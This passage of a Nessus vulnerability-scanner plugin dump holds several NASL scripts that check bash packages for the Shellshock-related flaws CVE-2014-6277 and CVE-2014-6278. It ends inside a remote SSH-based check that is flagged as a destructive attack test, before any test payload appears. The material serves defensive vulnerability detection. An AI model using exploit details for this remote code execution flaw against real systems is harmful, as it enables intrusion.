value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[4.1.2-29.0.1]\n- Fix segfaults from CVE-2014-6277 and CVE-2014-6278 completely. [orabug \n19905294]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-November/004664.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/21\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"bash-4.1.2-29.el6.0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bash-doc-4.1.2-29.el6.0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-doc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:47:41", "description": "Description of changes:\n\n[3.2-33.4.0.1]\n- Fix segfaults from CVE-2014-6277 and CVE-2014-6278 completely. [orabug 19905421]", "cvss3": {"score": null, "vector": null}, "published": "2014-11-21T00:00:00", "type": "nessus", "title": "Oracle Linux 5 : bash (ELSA-2014-3094) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6277", "CVE-2014-6278"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bash", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2014-3094.NASL", "href": "https://www.tenable.com/plugins/nessus/79376", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3094.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79376);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-6277\", \"CVE-2014-6278\");\n script_bugtraq_id(70165, 70166);\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n\n script_name(english:\"Oracle Linux 5 : bash (ELSA-2014-3094) (Shellshock)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[3.2-33.4.0.1]\n- Fix segfaults from CVE-2014-6277 and CVE-2014-6278 completely. [orabug \n19905421]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-November/004663.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/21\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"bash-3.2-33.el5_11.4.0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:48:40", "description": "Note that this is different than the public 'Shellshock' issue.\n\nSpecially crafted environment variables could lead to remote arbitrary code execution. This was fixed in bash 4.3.27, however the port was patched with a mitigation in 4.3.25_2.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-02T00:00:00", "type": "nessus", "title": "FreeBSD : bash -- remote code execution (512d1301-49b9-11e4-ae2c-c80aa9043978) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6277", "CVE-2014-6278"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:bash", "p-cpe:/a:freebsd:freebsd:bash-static", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_512D130149B911E4AE2CC80AA9043978.NASL", "href": "https://www.tenable.com/plugins/nessus/78016", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78016);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-6277\", \"CVE-2014-6278\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n\n script_name(english:\"FreeBSD : bash -- remote code execution (512d1301-49b9-11e4-ae2c-c80aa9043978) (Shellshock)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Note that this is different than the public 'Shellshock' issue.\n\nSpecially crafted environment variables could lead to remote arbitrary\ncode execution. This was fixed in bash 4.3.27, however the port was\npatched with a mitigation in 4.3.25_2.\"\n );\n # http://lcamtuf.blogspot.com/2014/09/bash-bug-apply-unofficial-patch-now.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?40115cbd\"\n );\n # https://vuxml.freebsd.org/freebsd/512d1301-49b9-11e4-ae2c-c80aa9043978.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f56a1f8d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bash-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/01\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/02\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"bash<4.3.25_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash-static<4.3.25_2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:48:23", "description": "Michal Zalewski discovered that Bash incorrectly handled parsing certain function definitions. If an attacker were able to create an environment variable containing a function definition with a very specific name, these issues could possibly be used to bypass certain environment restrictions and execute arbitrary code. (CVE-2014-6277, CVE-2014-6278)\n\nPlease note that the previous Bash security update, USN-2364-1, includes a hardening measure that prevents these issues from being used in a Shellshock attack.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-11T00:00:00", "type": "nessus", "title": "Ubuntu 10.04 LTS / 12.04 LTS / 14.04 LTS : bash vulnerabilities (USN-2380-1) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6277", "CVE-2014-6278"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:bash", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2380-1.NASL", "href": "https://www.tenable.com/plugins/nessus/78260", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2380-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78260);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-6277\", \"CVE-2014-6278\");\n script_bugtraq_id(70165, 70166);\n script_xref(name:\"USN\", value:\"2380-1\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 12.04 LTS / 14.04 LTS : bash vulnerabilities (USN-2380-1) (Shellshock)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Michal Zalewski discovered that Bash incorrectly handled parsing\ncertain function definitions. If an attacker were able to create an\nenvironment variable containing a function definition with a very\nspecific name, these issues could possibly be used to bypass certain\nenvironment restrictions and execute arbitrary code. (CVE-2014-6277,\nCVE-2014-6278)\n\nPlease note that the previous Bash security update, USN-2364-1,\nincludes a hardening measure that prevents these issues from being\nused in a Shellshock attack.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2380-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2020 Canonical, Inc. / NASL script (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(10\\.04|12\\.04|14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 12.04 / 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"bash\", pkgver:\"4.1-2ubuntu3.5\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"bash\", pkgver:\"4.2-2ubuntu2.6\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"bash\", pkgver:\"4.3-7ubuntu1.5\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-07T18:56:46", "description": "The remote host is running a version of Bash that is vulnerable to command injection via environment variable manipulation. Depending on the configuration of the system, an attacker could remotely execute arbitrary code.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-06T00:00:00", "type": "nessus", "title": "Bash Remote Code Execution (CVE-2014-6277 / CVE-2014-6278) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6277", "CVE-2014-6278"], "modified": "2022-06-29T00:00:00", "cpe": ["cpe:/a:gnu:bash"], "id": "BASH_REMOTE_CODE_EXECUTION2.NASL", "href": "https://www.tenable.com/plugins/nessus/78067", "sourceData": "#TRUSTED 3343d8b8c0045aac477135c38378a779ed32aa2bcb60c28f0890c6dda8c9f17997af085add62b1d7e881f6c272b5a350e87f17b45a34f0529d543ec4eb2b78fc65350a2ab7a97ea68b9eeec11ee827835508aa2353e0b55f49c5e3e6edaadcb4f6be56411465375ff3881bea57b49e6d4afe2bfc22ce94a855b7b7b846583ab4574a69aeb8627b79e282cf48e1da3af42c6ec6768a7fbbb5e8dc4ff8dc78b616a7b94d4f5f0a4c3719def4fcaca58b3046af21a0334327242f91caa8ec654bdcb6c2c396bb0c52106c02c161f01117106f9c1c5b9c0ec5e5adfad473bdc023411b7daf74a5f299e80d9cd1f5cd49e1717549befbf8bacbd7f1983c6ef44dec758129c55df262e564ec9ce38be5af5162adffbf54ed9b2cb7831bb94dc373b662727e734d13951b5a7a610ecc8298f0138121da1575e8a144824ef79ec9a8dd26fad348ee986cd03b876056a01d2a108c6a5124d05635e23daed79ae7cb330fe7b61ac27846b19fcca4a70fd28f2a1c532950069007f52dcf5808e1ac8ebe3a4e80607280fc89f9a3cdb866a4cf4a64a721349a3d9993a7d0da74ceb1d935241ef2268e3609cf08ddb4c6efbfa8e08fad698149da46dfa28f8015d0f16e91b94a2edca54b66e9297394aec489967f0b2e50d01ee26084a4c31f8a6f6025744420ecfb1fbef9df401c1a77d3f771449b295c669175bd4cea4f710702f6b8df92b5\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78067);\n script_version(\"1.35\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/29\");\n\n script_cve_id(\"CVE-2014-6277\", \"CVE-2014-6278\");\n script_bugtraq_id(70165, 70166);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34860\");\n\n script_name(english:\"Bash Remote Code Execution (CVE-2014-6277 / CVE-2014-6278) (Shellshock)\");\n script_summary(english:\"Logs in with SSH.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A system shell on the remote host is vulnerable to command injection.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Bash that is vulnerable to\ncommand injection via environment variable manipulation. Depending on\nthe configuration of the system, an attacker could remotely execute\narbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2014/Oct/9\");\n # http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e40f2f5a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update Bash.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-6277\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"Gain a shell remotely\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"telnet_func.inc\");\ninclude(\"hostlevel_funcs.inc\");\ninclude(\"misc_func.inc\");\n\n\nif(sshlib::get_support_level() >= sshlib::SSH_LIB_SUPPORTS_COMMANDS ||\n get_one_kb_item('HostLevelChecks/proto') == 'local')\n enable_ssh_wrappers();\nelse disable_ssh_wrappers();\n\nfunction report_and_exit(port, command, output, patch_check)\n{\n local_var hdr, report;\n\n report = NULL;\n if (report_verbosity > 0)\n {\n hdr =\n '\\n' + 'Nessus was able to login via SSH and run the following command :' +\n '\\n' +\n '\\n' + command;\n\n report =\n hdr +\n '\\n' +\n '\\n' + 'and read the output :' +\n '\\n' +\n '\\n' + output +\n '\\n';\n\n if(patch_check)\n {\n report +=\n 'This indicates that the patch for CVE-2014-6277 and ' +\n '\\n' + 'CVE-2014-6278 is not installed.';\n }\n\n }\n security_hole(port:port, extra:report);\n exit(0);\n}\n\n\nif ( islocalhost() )\n{\n info_t = INFO_LOCAL;\n}\nelse\n{\n ret = ssh_open_connection();\n if ( !ret ) audit(AUDIT_FN_FAIL, 'ssh_open_connection');\n info_t = INFO_SSH;\n if(info_t == INFO_SSH) ssh_close_connection();\n}\n\nport = get_service(svc:\"ssh\", default:22, exit_on_fail:TRUE);\nif (!get_port_state(port)) audit(AUDIT_PORT_CLOSED, port);\n\nret = ssh_open_connection();\nif ( !ret ) audit(AUDIT_FN_FAIL, 'ssh_open_connection');\n\n# Check CVE-2014-6277\n#\n# - We check CVE-2014-6277 first because this CVE covers some older\n# bash versions while CVE-2014-6278 doesn't, according to\n# http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html.\n#\n# - The 